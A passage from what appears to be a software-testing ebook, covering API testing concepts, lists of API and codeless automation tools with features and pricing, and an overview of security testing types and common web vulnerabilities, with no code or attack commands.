waiter picks up your food from the kitchen and serves it to you at your
table.
In this scenario, the waiter’s role is similar to an API. As a waiter, the
API takes a request from a source, takes that request to the database,
fetches the requested data from the database, and returns a response
to the source.
Now let’s see another example.
If you are using a flight service engine say Expedia, where you search
for flights on a specific date. Once you pass the data such as Source,
Destination, Onward Date, and Return Date and click on search.
Expedia sends a request to airlines through an API as per your search
details. The API then takes the airline’s response to your request and
delivers it right back to Expedia.
API gets the request from the user and gives the response without
exposing internal logic. API acts like an Abstraction in the OOPs
concept.
What is API Testing?
API testing is a type of software testing that involves testing APIs
directly and also as a part of integration testing to check whether the
API meets expectations in terms of functionality, reliability,
performance, and security of an application. In API Testing our main
focus will be on a Business logic layer of the software architecture.
API testing can be performed on any software system which contains
multiple APIs. API testing won’t concentrate on the look and feel of the
application. API testing is entirely different from GUI Testing.
Let’s see how is UI testing is not similar to API testing?
UI (User Interface) testing is to test the graphical interface part of the
application. Its main focus is to test the look and feel of an application.
On the other hand, API testing enables the communication between
two different software systems. Its main focus is on the business layer
of the application.
API Testing Types?

API testing typically involves the following practices:
• Unit testing: To test the functionality of individual operation

• Functional testing: To test the functionality of broader
scenarios by using a block of unit test results tested together
• Load testing: To test the functionality and performance under
load
• Runtime/Error Detection: To monitor an application to identify
problems such as exceptions and resource leaks
75
• Security testing: To ensure that the implementation of the API

is secure from external threats
• UI testing: It is performed as part of end-to-end integration tests
to make sure every aspect of the user interface functions as
expected
• Interoperability and WS Compliance testing: Interoperability
and WS Compliance Testing is a type of testing that applies to
SOAP APIs. Interoperability between SOAP APIs is checked by
ensuring conformance to the Web Services Interoperability
profiles. WS-* compliance is tested to ensure standards such as
WS-Addressing, WS-Discovery, WS-Federation, WS-Policy,
WS-Security, and WS-Trust are properly implemented and
utilized
• Penetration testing: To find vulnerabilities of an application
from attackers
• Fuzz testing: To test the API by forcibly input into the system in
order to attempt a forced crash
Refer: 100+ Types of Testing
Common tests on APIs:
Some of the common tests we perform on APIs are as follows.
• To verify whether the return value is based on the input

condition. The response of the APIs should be verified based on
the request.
• To verify whether the system is authenticating the outcome
when the API is updating any data structure
• To verify whether the API triggers some other event or request
another API
• To verify the behavior of the API when there is no return value
Advantages of API Testing:
• API Testing is time effective when compared to GUI Testing.
API test automation requires less code so it can provide faster
and better test coverage.
• API Testing helps us to reduce the testing cost. With API
Testing we can find minor bugs before the GUI Testing. These
minor bugs will become bigger during GUI Testing. So finding
those bugs in the API Testing will be cost-effective to the
Company.
• API Testing is language independent.
• API Testing is quite helpful in testing Core Functionality. We can
test the APIs without a user interface. In GUI Testing, we need
to wait until the application is available to test the core
functionalities.
• API Testing helps us to reduce the risks.
What exactly needs to be verified in API Testing?
76
Basically, on API Testing, we send a request to the API with the

known data and we analyse the response.
• Data accuracy
• HTTP status codes
• Response time
• Error codes in case API return any errors
• Authorization checks
• Non-functional testing such as performance testing, security
testing
Tools used for API Testing:
Some of the tools used for API Testing are as follows:
• Postman
• Katalon Studio
• SoapUI
• Assertible
• Tricentis Tosca
• Apigee
• JMeter
• Rest-Assured
• Karate DSL
• API Fortress
• Parasoft
• HP QTP(UFT)
• vREST
• Airborne
• API Science
• APIary Inspector
• Citrus Framework
• Hippie-Swagger
• HttpMaster Express
• Mockbin
• Ping API
• Pyresttest
• Rest Console
• RoboHydra Server
• SOAP Sonar
• Unirest
• WebInject
Refer this link to learn more about these API Testing Tools
Difference between API testing and Unit Testing?
UNIT TESTING:
• Unit testing is conducted by the Development Team
• Unit testing is a form of White box testing
• Unit testing is conducted prior to the process of including the
code in the build
77
• Source code is involved in Unit testing

• In unit testing, the scope of testing is limited, so only basic
functionalities are considered for testing
API TESTING:
• API testing is conducted by QA Team
• API testing is a form of Black box testing
• API testing is conducted after the build is ready for testing
• Source code is not involved in API testing
• In API testing, the scope of testing is wide, so all the issues that
are functional are considered for testing
Challenges in API testing:
Some of the challenges we face while doing API testing are as follows
• Selecting proper parameters and its combinations

• Categorizing the parameters properly
• Proper call sequencing is required as this may lead to
inadequate coverage in testing
• Verifying and validating the output
• Due to absence of GUI it is quite difficult to provide input values
Types of bugs we face when performing API testing:
Issues observed when performing API testing are
• Stress, performance, and security issues

• Duplicate or missing functionality
• Reliability issues
• Improper messaging
• Incompatible error handling mechanism
• Multi-threaded issues
• Improper errors
API Testing Best Practices:
• Test for the expected results
• Add stress to the system by sending series of API load tests
• Group API test cases by test category
• Create test cases with all possible inputs combinations for
complete test coverage
• Prioritize API function calls to make it easy to test
• Create tests to handle unforeseen problems
• Automate API testing wherever it is possible
Here I have hand-picked few posts which will help you to learn more.
• API Testing Interview Questions
• SOAP Interview Questions
• Postman Tutorial (API Testing using Postman)
78
Best API Testing Tools for 2020

(Updated list) | Software Testing
Material
API testing (Application Programming Interface Testing) is a software
testing type that focuses on the determination if the developed APIs meet
expectations regarding the functionality, reliability, performance, and
security of the application.
The interest in API testing has been growing steadily over the last couple of
years, according to Google Trends. Research by Smartbear over 5,000
software professionals in 2017 showed the number of API testers
automating more than 50% of their tests expected the numbers to grow by
30% ( from 59% to 77%) in the next two years and 80% of the survey
participants reported they were responsible for testing APIs.
Having the right process, tool, and solution for API automation tests are
more critical than ever. And with the shift-left trend, API testing is more than
just a quality control solution but a crucial component of a success CI/CD
deployment.
Top 10 API Testing Tools for 2020

1. Katalon Studio
Katalon Studio is a free automation test tool providing a common
environment to create and execute UI functional, API/Web services,
and mobile testing.
The capability to combine UI and Business levels (API/Web services)
for different environments (Windows, Mac OS, Linux) has been
considered an advantage of Katalon Studio.
Katalon Studio supports SOAP and RESTful requests with various

types of commands (GET, POST, PUT, DELETE) with parameterized
capability.
– Highlights:
• Support combination test between UI and API verification.

• Support testing both SOAP and RESTful requests.
• Hundreds of built-in keywords for creating test cases.
• Support one of the most powerful assertion library, AssertJ to
create fluent assertion with BDD style.
• Support the data-driven approach.
• Can be used for both automated and exploratory testing.
• Suitable for both pros and non-techies via the support of Manual
and Groovy Scripting modes
79
Named as one of the 2020 Gartner Peer Insights Customers’

Choices for Software Test Automation — Katalon Studio has received
more than 600 positive reviews, affirming its position at the forefront of
the market.
Website: Katalon Studio
Pricing: Free – $69/license/month
2. Postman
Being originally a Chrome browser plugin, Postman now extends its
solution with the native version for both Mac and Windows.
Complete Postman Tutorial

Postman is a good choice for API testing for those who don’t want to
deal with coding in an integrated development environment using the
same language as the developers.
• Easy-to-use REST client
• Rich interface which makes it easy to use
• Can be used for both automated and exploratory testing
• Can be run on Mac, Windows, Linux & Chrome Apps
• Has a bunch of integrations like support for Swagger & RAML
formats
• Has Run, Test, Document and Monitoring Features
• Doesn’t require learning a new language
• Enable users to easily share the knowledge with the team as
they can package up all the requests and expected responses,
then send to their colleagues.
Website: Postman
Pricing: Free – $12/user/month
3. SoapUI
SoapUI is a headless functional testing tool dedicated to API testing,
allowing users to test REST and SOAP APIs and Web Services easily.
Using SoapUI, users can get the full source and build the preferred
features besides these abilities:
Free Package
• Create test quickly and easily with Drag-and-drop, Point-and-
click
• Reusability of Scripts allows load tests and security scans to be
reused for functional test cases in just several steps
Pro Package
• Powerful data-driven testing: Data loaded from files, and
databases, and Excel so that they can simulate how consumers
interact with the APIs
• Create complex-scenarios & support native CI/CD integrations,
asynchronous testing
80
SOAPUI latest version 5.5 released in February 2019 had introduced

the Endpoint Explorer dialog for users to send exploratory requests
and analyze responses without creating a project. The tool also
supports extended HTTP methods such as PROPFIND, LOCK,
UNLOCK, COPY, PURGE.
Website: SoapUI
Pricing: Free – $659/year
4. Tricentis Tosca
Tricentis Tosca is a continuous testing platform for Agile and DevOps.
Benefits of Tricentis Tosca include:
• Supports many array of protocols: HTTP(s) JMS, AMQP, Rabbit

MQ, TIBCO EMS, SOAP, REST, IBM MQ,NET TCP
• Integrates into the Agile and DevOps Cycle
• Maximize reuse and maintainability with model-based test
automation
• API tests can be used across mobile, cross-browser, packaged
apps, etc…
• Achieve sustainable automation with new technology
• Reduce the time of regression testing
• Interactive testing provides test managers with the ability to
execute manual testing and collect results without having to
configure Tosca environments.
The latest Tricentis Tosca version 13.1 released in March 2020 can
support web service security configuration in the API Connection
Manager. Users can use the signature security option to sign multiple
parts of a message. In addition, from Tosca version 13.0, testers are
allowed to read and write files dynamically with a file connection in the
API Engine.
Website: Tricentis
Pricing: Contact Sales
5. Apigee
Apigee is a cross-cloud API testing tool, allowing users to measure
and test API performance, supports, and build API using other editors
like Swagger.
Additionally, Apigee is recognized as one of the leaders in the Gartner

Magic Quadrant 2019 for Full Lifecycle API Management for the fourth
consecutive time.
• It is multi-step and powered by Javascript
• Allows the design monitor, deploy, and scale APIs
• Identify performance issues by tracking API traffic, error rates,
and response times
81
• Easily create API proxies from the Open API Specification and
deploy them in the cloud
• Cloud, on-premise, or hybrid deployment model on a single
code base
• PCI, HIPAA, SOC2, and PII for apps and APIs
• Apigee is purpose-built for digital business, and the data-rich
mobile-driven APIs and apps that power it.
Starting from February 2019 with the release of version 4.19.01,
Apigee gave users even more flexibility to manage their APIs with
features like Open API 3.0 support, TLS security, self-healing with
apigee-monit, virtual host management improvements, and more
software support. The latest 4.19.6.04 announced in Apr 2020 with
minor bug fixes only.
Website: Apigee
Pricing: Contact Sales
6. JMeter
JMeter (open source) is widely used for functional API testing although
it is actually created for load testing.
• Supports replaying of test results
• Automatically work with CSV files, allowing the team to quickly
create unique parameter values for the API tests.
• Users can include the API tests in CI pipelines thank to the
integration between JMeter and Jenkins
• It can be used for both static as well as dynamic resources
performance testing
The most recent release in November 2019 is JMeter 5.2. The tool
has been packed with multiple features and enhancements, improved
user experience, and many bug fixes, such as new protocol,
JMESPath extractor, JDBC improvements, StringtoFile, HTTP
Samplers.
Website: JMeter
Pricing: Open source
7. Rest-Assured
Rest-Assured is an open-source Java Domain-specific language that
makes testing REST service more simple.
• Have a bunch of baked-in functionalities, which means users
don’t have to code things from scratch.
• Integrates seamlessly with the Serenity automation framework,
so that users can combine the UI and REST tests all in one
framework that generates awesome reports.
• Support BDD Given/When/Then syntax
• Users don’t necessarily need to be an HTTP expert
82
Starting from version 4.0.0, Rest-Assured requires at least Java 8,

instead of Java 6 as was previously required. This version also
supported Apache Johnzon and fixed bunches of issues with the initial
OSGi support. The latest version 4.2.0 announced in January 2020
allowed a nicer experience for Kotlin developers using the spring-
mock-mvc module.
Website: Rest Assured

Pricing: Open Source
8. Assertible
Assertible is an API testing tool which concentrates on the automation
and reliability.
• Support for automating API tests through each step of a

continuous integration and delivery pipeline.
• Support for running API tests after deployments and integrates
with familiar tools like GitHub, Slack, and Zapier.
• Support validating HTTP responses with turn-key assertions
such as JSON Schema validation and JSON Path data integrity
checks
• The Sync feature allows users to update tests when their
specifications change, so they are no longer have to manually
update their tests after adding new parameters or changing the
response of API.
In October 2019, Assertible introduced the latest feature called
Encrypted variables, which provides a new way to store tokens,
passwords, and secret data fields required by tests to improve API
testing security practices. Encrypted variables are not only trivial to
use, but build on the cryptographically sound methodology for safe
storage.
Website: Assertible
Pricing: Free – $100/month
9. Karate DSL
Karate DSL is a new API testing tool which help create scenarios for
API-based BDD tests in a simple way without writing step definitions.
Those definitions have been created by KarateDSL so that users can
kickstart the API testing quickly.
• Build on top of Cucumber-JVM

• Can run a test and generate reports like any standard Java
project
• A test can be written without any Java knowledge required
• Tests are easy to write even for non-programmers
83
• Supports configuration switching/staging, multi-threaded parallel

execution
Starting from the version 0.9.3, Karate UI is no longer part of the open-
source tool’s core but a separate Maven artifact. This version included
built-in support for WebSocket that is based on the async capability.
The latest update Karate UI 0.9.5 in February 2020, came with web
browser automation which allows users to submit a self-contained
snippet of HTML as a full-fledged project — to demo or replicate
issues.
Website: Karate
Pricing: Open Source
10. Swagger
Swagger is an API testing tool that allows users to start their
functional, security, and performance testing right from the Open API
Specifications. Swagger tooling and Ready API platform make it easy
to quickly create, manage, and execute API tests in the pipeline.
• Swagger Inspector provides capabilities to inspect API request-

responses, and make sure they perform as expected
• Import user’s API definitions to easily validate schema rules,
automatically generate assertions against endpoints and inject
synthetic data into parameters
• Generate complex load scenarios to test the scale and
performance of API
• Support all types of services from REST, SOAP to GraphQL
Open API Spec version 3.0 in March 2019, the new feature Swagger
Hub Domains was introduced. With this feature, developers can take
frequently used objects, path items, response, and store them in
separate files to be referenced across multiple different API
definitions. These re-usable Domains can be versioned, published,
and shared for collaborative feedback among large teams.
Website: Swagger
Pricing: Open-source
11. No one-size-fit-all tools
It hurts, but true!
We believe the list above nominates the best solution available out
there if you are planning to adopt API automation testing. However,
like most of the solutions in this industry, finding the ideal-one-tool to
do it all is almost impossible.
Some may find the features of the commercial players (Postman,

Tricentis Tosca, etc.,) are sufficient but the costs of ownership will be
the show-stop factor. Open source solutions (Rest-Assured, Karate
DSL, etc.,) are affordable but require skilled resources and effort to
84
implement the right frameworks. Tools which seem to be a relative

balance between cost and other factors such as Postman, Katalon
Studio might have drawbacks to specific project types that need to be
considered.
No one-size-fit-all tool
API testing established its trend in automation testing, and more tools
will be developed to serve the growing demands of the software
development teams. Finding the perfect tool is still tough, but we have
the good news that you have way more choices than before. Carefully
considering your requirements, pros and cons of each solution — try
not too ambitious at the early stage and trial the top 5 relevant
candidates from the list above. With the POC for these solutions
created, you will have a better knowledge of your project’s critical
factors and fine-tune your shortlist. This approach gives you a good
chance to identify a suitable tool for the current status and information
of the next choice when your project is more mature.
This article was last modified in May 2020 and will be regularly
updated with the latest top API testing tools and their functionalities.
We love to hear your feedback. Leave a comment below if you have
any suggestions on API testing products!
I would love to hear your feedback and let me know if you have other
tools to record for the others’ reference.
Best Codeless Testing Tools In

2020 | Software Testing Material
I have to admit that coding is complicated. Especially when computers
nowadays can carry out commands, to varying degrees of sophistication.
Products are growing at a fast pace in varied directions, thus having testers
try to learn many complex programming languages while finishing backlogs
in weeks can be a frustrating experience. With the emergence of codeless
testing tools, you don’t have to concern yourself with such feasts yet.
Basically, codeless test automation tools originally made to help testers

avoid the extensive hours of programming. Codeless tools empower users
to automate robust and reusable tests by combining Artificial Intelligence
(AI) and Machine Learning algorithms into the self-healing mechanism,
which ultimately leads to continuous test execution and consistent results.
Another huge benefit is that codeless tools are more user-friendly. A host of
supported integrations and features can transform complicated codes to a
simplified testing suite for all business teams to engage in testing despite
their skill sets.
85
Codeless automation is increasingly endorsed as one of the most

prominent automation testing trends in 2020.
Let’s take a holistic view of The Most Popular Codeless Testing

Tools in 2020.
Katalon Studio
Katalon Studio is one of the best-renowned testing solutions for Web,
API, Mobile, and Desktop applications. With this tool, building a
framework from scratch is no longer a hurdle for beginners since they
can import a variety of external libraries.
Programmers are even equipped with abundant built-in keywords and

dual-scripting interfaces to make it easier to advance their test scripts.
Therefore, if you want to write test scripts right away and gather such
design principles along the way, Katalon Studio would be a great fit.
Highlight features:
• No coding skillsets & complex figures required
• Web Recorder Utility takes in all movements on the app and
transforms them into runnable codes in the back-end
• BDD Cucumber capability allows stakeholders to take part in
testing at ease
• Insightful analytics dashboard and reports
• CI/CD pipeline and ALM system integrations involving Git,
Jenkins, qTest, Jira, CircleCI, etc.
• Smart Wait feature is a present for Selenium lovers to fully
eliminate Selenium wait issues without writing any additional
codes
• Built-in and custom keywords to transfer keywords in test
projects without any changes in the external behaviors
Named as a 2020 Gartner Peer Insights Customers’ Choices for the
Software Test Automation market, Katalon Studio stands a strong
belief in customer’s mind as the best option for when they need a
codeless testing tool.
Pricing: Free – $759/year
Here is a Katalon Tutorial
TestCraft
86
TestCraft is an end-to-end codeless selenium test automation

platform. In the case of other codeless testing tools with record-and-
playback features, whatever was recorded would be “played back” to
test the app’s usability. If tweaking some codes breaks the test, you
might have to re-record it and let it run all over again.
TestCraft, on the other hand, offers “on-the-fly rebinding,” which refers
to more hands-on execution of tests. You can fix the broken codes
immediately, thereby rebinding the elements. Tests are adjusted in
real-time without bothering about re-recording the entire test scenario.
Highlight features:
• No extra plugins required
• Run tests on multiple browsers simultaneously
• Create flows easily for application monitoring
• Detailed reports for every execution
• Reuse elements and flows across scenarios
• On-the-Fly fixing
• Dual output: data & scenario
• Multiple built-in integrations including Test Management, Issue
Management, Notifications & Communication
Website: TestCraft
Pricing: Commercial – Contact sales.
Perfecto
Trusted by many major enterprises, Perfecto provides Mobile, Web,

and IoT quality solutions. Moreover, the R&D duty at Perfecto mainly
focuses on ensuring its cloud-based solutions work smoothly despite
any market issues such as new iOS or Android version updates, new
browser or smartphone releases, obviously even new features or
improvements made to the cloud offering.
Highlight features:
• Main performance indicators improve velocity and efficiency for
teams
• Combine data using AWS services like EC2, ECS, Lambda, S3,
DynamoDB, and more
• Tests can run on various Android devices in parallel
• Switch to a microservices framework to deliver same-day
support for the latest mobile and web operating systems
87
• Perfecto Connectivity Layer: Besides new releases, the

engineers update every day to both their internal stakeholders
and customers about issues taking place and how to address
them
• Integrate into Appium, Selenium, Espresso and more
Website: Perfecto
Pricing: From $3,600/year.
CloudQA
CloudQA provides a unified platform that meets a variety of testing

requirements. Besides its record-and-playback tool, CloudQA also
gives you an integrated reporting tool for quickly creating and
scheduling regression testing suits.
Built on top of Selenium, CloudQA integrates with multiple third-party

applications, which makes building test cases easier. Plus, your web
page performance is constantly monitored at a fraction of the cost.
Highlight features:
• Monitoring many data sets geographically
• Real-time alert via a rich set of alerting options
• Recording to monitoring in less than 5 minutes
• Huge capacity to maintain up to 1000 tests easily
• Integrations with ALM tools, CI/CD pipeline, team
communication apps (Slack, SMS, webhooks), bug tracking
tools, and version control tools (GitHub, TFS)
Website: CloudQA
Pricing: From $1,188/year
Sikuli
Sikuli is a Python-based GUI test automation solution that automates

anything you see on the screen using its “Visual Image Match” method
to recognize GUI elements. That means, all the web elements act as
an image kept within the project. A massive benefit of Sikuli is that it
88
can effectively automate flash objects without their ID or names,

especially when there are stable GUI components.
In addition, along with Selenium WebDriver, Sikuli provides a very

friendly Sikuli-script.jar that can automate Adobe Video/Audio players,
flash games without a single line of code.
Highlight features:
• Extensive support to automate Flash Objects/Websites
• “Visual Match” mechanism to powerfully automate desktop &
flash objects
• All methods can be accessed using screen class objects
• Easily integrate with Selenium and all other tools (see Sikuli
Tutorial of Selenium Integration)
• Not suitable for web automation tasks as it has no browser
recorder
Website: Sikuli
Pricing: Open-source
TestProject
TestProject is a free end-to-end test automation platform that makes

Selenium and Appium testing easy. You can test web, mobile, and
even API’s using open source technology without all the usual
headaches that come with it. TestProject is the top free tool according
to Gartner with an average rating of 4.6/5 stars.
TestProject’s Key Benefits:

• Scriptless test recorder for non-technical users, with compatible
export to Selenium and Appium
• Advanced scripting SDK (import existing Selenium and Appium
tests)
• Cloud test storage and page object repository
• Beautiful executive analytics and dashboards
• 200+ community-powered addons
• Built-in integrations for Sauce Labs, BrowserStack, Jenkins,
Slack, and more
Don’t bother with building and maintaining a bespoke Selenium test
framework, when TestProject already helps you to:
• Create and execute tests on Windows, Linux, macOS, and even

Docker
89
• Install and manage Selenium, Appium, and all required

dependencies
• Distribute test execution locally and in the cloud
• Specify user and project permissions
Website: TestProject
Pricing: Free
Check this TestProject review for more details
TestingWhiz
TestingWhiz is a codeless automation testing tool that provides

automated testing solutions to software companies for their Software,
Web, Mobile, Database, Cloud, Web Services, and API testing. It
automates, executes, and manages test cases effortlessly &
efficiently.
Features:
• Fast Automation Engine to help you create automated test
cases, on a keyword and data-driven structure, object-based
architecture with Java scripting
• With its Visual Recorder, you can automate testing of desktop-
based applications, widgets as well as flash applications using
inputs from onscreen actions such as Input, Scroll, Clicks,
Cancel, and more.
• With its Integrated Mobile Recorder, you can automate test
recording on multiple mobile applications/devices.
• With its Integrated OCR Capability, you can reduce the need for
keying in data by detecting and extracting the text from images
• Integrated PDF and Excel Commands.
• Multiple web browsers support such as Chrome, Firefox,
Internet Explorer(IE) and Microsoft Edge along with Android and
iOS mobile browsers
Website: Testing-Whiz
Pricing: Contact
EndTest
90
Endtest is a cloud platform where you can easily create, manage, and
run Automated Tests. With EndTest anyone can write complex
automated tests, without having to write code.
Features:
• Run the same test suite on any operating system, browser or
mobile device.
• Supports Parallel Execution
• Parameterized Testing
• It supports testing browser extensions
• Integrates with services like Bamboo, Travis CI, CircleCI,
TeamCity, Jenkins, GitHub, GitLab, etc.,
Website: EndTest
Pricing: It offers a free trial. Pricing starts at $138 / month
Mabl
Mabl is a unified intelligent test automation platform for the CI/CD

ecosystem. Mabl enables easier test creation, execution, and control,
thus increasing test coverage, development speed, and overall
application quality.
As Mabl is very lightweight, it is really simple to execute them and

trigger them in a timely fashion. Along with its cool visuals, anomalies
monitoring, and auto-healing concepts, Mabl keeps the automation
scripts running stably regardless of any huge UI changes in the
product code. Both testers and programmers can write scriptless code
by simply fetching data using the user’s recorded actions.
Highlight features:
• A fresh UI and design approach run tests periodically with
suggestions
• Reuse tests across different browsers
• Run infinite tests in parallel
• Testing nodes are scaled up in the cloud as you need them,
with real browser installations on virtual machines.
• The output consists of screenshots for relatively easy failure
troubleshooting
• Extensive data reports and insights
• JavaScript steps can be used for API requests and custom
assertions
91
• Integrates with tools like Jenkins, Bamboo, CircleCI, Slack.

Website: Mabl
Pricing: Contact sales
Applitools
Applitools provides an end-to-end UI testing solution powered by

Visual AI, thus revolutionizes how organizations approach quality. It
ensures web and mobile applications operate efficiently as designed
across many devices, browsers, OS, or native applications.
Applitools can be quickly integrated with any DevOps environment,

easy to use by any team members, and scalable to any-size
organizations looking to speed up and increase quality at every
release.
Highlight features:
• Cross-device and browser tests
• Support multiple programming languages
• Build functional test reports with screenshots, baseline images,
and easy zoom-in on changes
• Collaborate with your team by integrating your functional test
execution reports with Jira, Slack, and email.
• Baseline branching to push an up-to-date baseline along with
your code
• Web API and merge CLI tools to allow merging the source and
target baselines to resolve conflicts
• No inbound firewall changes or tunnel configuration required
• Integrates with the tools like Jenkins, CircleCI, TeamCity, Travis
and other CI systems.
• Open Jira tickets directly from the Applitools test manager.
Website: Applitools
Pricing: Contact sales
Usetrace
Usetrace is a regression testing automation software for Web

applications. It builds robust cross-browser test suites consisting of
92
reusable routines for efficient test maintenance. Regardless of your

coding skills, you can reuse modules to speed up tests using
Usetrace.
Moreover, Usetrace also offers additional features involving project
management and collaboration, data analysis and reports, editor
tracing, responsive testing, and synchronization & waiting.
Highlight features:
• Ease of creating traces
• Flexibility in maintaining traces
• Robust load balancing, performance and regression tests
without coding
• Its latest version is being tested all the time
• A visual dashboard to check how your site is doing
• Integrations with Slack, JIRA, Jenkins, Visual Studio Online,
GitHub, Codeship, Flowdock, Bitbucket, and HipChat
• Instant email or SMS alert if something happens
Website: Usetrace
Leapwork
Leapwork is a cloud-based enterprise automation platform suitable for

different technical levels, from testers, test managers, business
specialists to DevOps professionals. It empowers workforces to
execute automated testing and processes across web applications,
Windows applications, SAP applications, and more.
Leapwork flexibly facilitates intelligent automation, end-to-end

verification, collaboration, and some integrated tools such as a
graphical workflow editor and automated test builder – which I am sure
will work remotely on an agent to build tests.
Highlight features:
• No need to adjust the automation flows anytime the system
under test alters
• Schedules start from DevOps by calling the REST API from
Powershell scripts
• Automate and test applications in any operating system,
browser version, desktop or mobile device
• It comes with built-in Sauce Labs and BrowserStack cloud
integrations for total coverage
93
• Clever strategy editor decides how to identify the GUI elements

being manipulated
• When an ad hoc schedule is stuck running and filled up the
HDD, you have to restore the server from backup.
• It comes with native plugins for Jenkins, Azure Devops
Server/TFS, TeamCity, and Bamboo and can also be integrated
with bug management systems.
Website: Leapwork
Pricing: Contact sales.
Ranorex
Ranorex is one of the most comprehensive tools today that supports

Web, Desktop (Windows only), and Mobile testing. Its customization
with third-party frameworks serves for both new users and high-level
testers.
Siemens, Lufthansa, Cisco, Dell, and IBM, to name but a few trusted
Ranorex to automate their testing. With Ranorex, you can create an
all-in-one environment that can be easily spread with more
innovations.
Highlight features:
• Automate complex GUI testing using object recognition and
following each user scenario
• Ranorex Recorder can record and playback actions through an
action table editor, then convert them into natural languages
• Selenium WebDriver integration flexibly fixes all pain points
Selenium still has
• Flexible test automation interface launching all executed .EXE
files from the command line
• Seamless integration with the most common CI tools such as
Jira, Jenkins, Bamboo, or TeamCity
• It supports standard programming languages such as VB.NET
and C#
• No support macOS
Website: Ranorex
Conclusion:
To sum up, codeless automation testing can be said a vital practice
that product teams should adopt and a must-have criterion for
automation testing tools. Codeless test automation is the greatest
94
solution for IT and business teams to fill the gap of technical level,
eliminate testing bottlenecks, and reduce the time and effort spent on
maintenance costs.
With a set of features conformed, codeless test automation is viewed
by QA experts as the chosen solution to ingrain into their existing
DevOps cycle. Regardless of your role in your team and project,
codeless tools will continue to advance, and you don’t want to miss
out on them in 2020.
Related Posts:
• Web Application Testing Tools
• Functional Testing Tools
• Unit Testing Tools
• Regression Testing Tools
• Cross Browser Testing Tools
• RPA Testing Tools
• Service Virtualization Tools
• Performance Testing Tools
• Penetration Testing Tools
• Mobile App Testing Tools
If you are looking to dig into our latest posts then check out
our homepage.
Like this post? Don’t forget to share it!
Happy Testing!
Security Testing Tutorial |

What is Security Testing?
data and maintains functionality as intended.
It is a type of Software Testing that aims to find out all possible

loopholes and weaknesses of the system in the starting stage itself to
avoid inconsistent system performance, unexpected breakdown, loss
of information, loss of revenue, loss of customer’s trust.
It comes under Non-functional Testing.
95
We can do this testing using both manual and automated security

testing tools and techniques. Security testing reviews the existing
system to find vulnerabilities.
Most of the companies test security on newly deployed or developed
software, hardware, and network or information system environment.
But it’s highly recommended by experts to make security testing as a
part of information system audit process of an existing information
system environment in detecting all possible security risks and help
developers in fixing them.
What are the major focus areas in

Security Testing
The following are the four major focus areas to be considered in terms
of testing the security of a web application.
Network security:
Testers have to look for the vulnerabilities in the network infrastructure
(resources and policies).
System software security:

Testers have to assess the weaknesses in various software such as
operating systems, databases, and other related software on which
the application depends on.
Client-side application security:
To make sure that the client browser and related tools are not
manipulated.
Server-side application security:

To make sure that the server and its related technologies are robust
enough to block any vulnerabilities.
What are the principles of Security

Testing?
It aims at covering following basic security components
1. Authentication
2. Authorization
3. Availability
4. Confidentiality
5. Integrity
6. Non-repudiation
96
Why Security Testing is Important?

Software security testing is important due to the increase in the
number of privacy breaches that websites are facing today. In order to
avoid these privacy breaches, software development organizations
have to adopt this testing in their development strategy based on
testing methodologies and the latest industry standards.
It is important to adopt a Security Process in each and every phase of
SDLC.
• Requirement Phase: Security analysis of all the requirements
• Design Phase: Implementation of Test Plan including Security
tests.
• Code & Unit Testing: Security White Box Testing
• Integration Testing: Black Box Testing
• System Testing: Black Box Testing & Vulnerability Scanning
• Implementation of System Testing: Penetration Testing &
Vulnerability Scanning
• Support: Impact Analysis
Top Vulnerabilities:
Security tests include testing for vulnerabilities such as
• SQL Injection
• Cross-Site Scripting (XSS)
• Session Management
• Broken Authentication
• Cross-Site Request Forgery (CSRF)
• Security Misconfiguration
• Failure to Restrict URL Access
• Secure Data Exposure
• Insecure Direct Object Reference
• Missing Function Level Access Control
• Using Components with Known Vulnerabilities
• Unvalidated Redirects and Forwards
What are the Types of Security Testing
There are seven main types of security testing which are presented
below.
Vulnerability Scanning:
In vulnerability scanning (aka vulnerability assessment), we just
identify and report the vulnerability using vulnerability scanning tools.
It’s the first step to improve the security of a system.

97
A vulnerability assessment report should contain the title, the

description, and the severity of a vulnerability.
Security Scanning:
Security scanning is done to find weak points in the security of
network and system and also provides solutions to reduce these risks.
Penetration Testing:
In Penetration Testing (aka Pen test), we identify the vulnerabilities
and attempt to exploit them using penetration testing tools. We repeat
the same penetration tests until the system is negative to all those
tests.
Pen testing can be divided into three techniques such as manual

penetration testing, automated penetration testing, and a combination
of both manual & automated penetration testing.
Read more on Pen Testing Techniques

Risk Assessment:
Risk assessment involves reviewing and analyzing security risks that
later will be prioritized as Low, Medium, and High. It also recommends
possible ways to prevent risk.
Security Auditing:
Security auditing is the procedure of defining security flaws. It is an
internal inspection of systems to find security flaws. In some cases, an
audit is done via line by line inspection of code
Ethical Hacking:
Ethical hacking is done on a system with an intent to find and expose
security issues in the system. Ethical hacking is done by a white hat
hacker. White hat hacker is a security professional who uses their
skills in a legitimate manner to reveal the defects of a system.
Read more: Types of Hackers

Posture Assessment:
Posture assessment is a combination of security scanning, ethical
hacking, and risk assessment to present the security posture of a
system or organization.
Techniques for security testing

Techniques/Methodologies followed in Security Testing are as follows.
Black Box Testing:
98
In Black Box, testers are authorized to do testing on everything about

the network topology and the technology.
Grey Box Testing:

In Grey Box, testers are provided with partial information about the
system. It is a hybrid of white and black box models.
Tiger Box Testing:

It is done in a system that has a collection of operating systems and
hacking tools. It helps security testers to conduct vulnerabilities
assessment and attacks.
Security Testing Tools:
To find the flaws and vulnerabilities in a web application, there are
many free, paid, and open-source tools available in the market. We
know that the advantage of open source tools is that we can easily
customize it to match our requirements. We are here to showcase
some of the top 12 open-source security testing tools.
We use these testing tools for checking how to secure a website or
web application is.
Open Source Security Testing Tools:

Some of the open-source tools are Zed Attack Proxy, Wfuzz, Wapiti,
etc.,
Commercial Security Testing Tools:
Some of the commercial tools are GrammaTech, Appscan, Veracode,
etc.,
To learn more you can also check the OWASP (Open Web Application
Security Project) site.
Conclusion:
We know how important is security testing in current days. It aims to
find out all possible loopholes and weaknesses of the system. Testers
play a role of an attacker to find out security-related bugs in the
system.
If you have any queries, please comment below.

Related posts:
• Penetration Testing – Detailed Guide
• Most popular Penetration Testing tools
99
Top 12 Open Source Security

Testing Tools for Web
Applications in 2020
As a Software Tester of many years, I am always keen to test out new
Software Testing Tools that can help me build awesome websites. I am so
excited to bring these open source security testing tools before you through
this post.
Note: You should only use these Security Testing Tools to attack an
application that you have permission to test.
In this post, we are going to see the following:
• 1. What is Security Testing

• 2. Zed Attack Proxy
• 3. Wfuzz
• 4. Wapiti
• 5. W3af
• 6. Vega
• 7. SQLMap
• 8. SonarQube
• 9. Nogotofail
• 10. Grabber
• 11. Arachni
• 12. Skipfish
